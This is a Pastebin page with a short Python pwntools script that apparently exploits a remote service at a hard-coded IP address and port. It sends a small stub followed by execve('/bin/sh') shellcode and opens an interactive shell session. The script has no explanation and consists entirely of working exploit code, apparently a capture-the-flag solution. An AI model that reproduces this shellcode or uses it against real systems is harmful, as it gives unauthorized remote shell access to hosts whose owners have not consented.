Advertisement
Guest User

Untitled

a guest
Apr 26th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.25 KB | None | 0 0
  1. from pwn import *
  2. sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
  3. def show():
  4.     r=remote("125.235.240.168",27019)
  5.     r.send('\x83\x2c\x24\x22\xc3')
  6.     r.send(sc)
  7.  
  8.     r.interactive()
  9. show()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement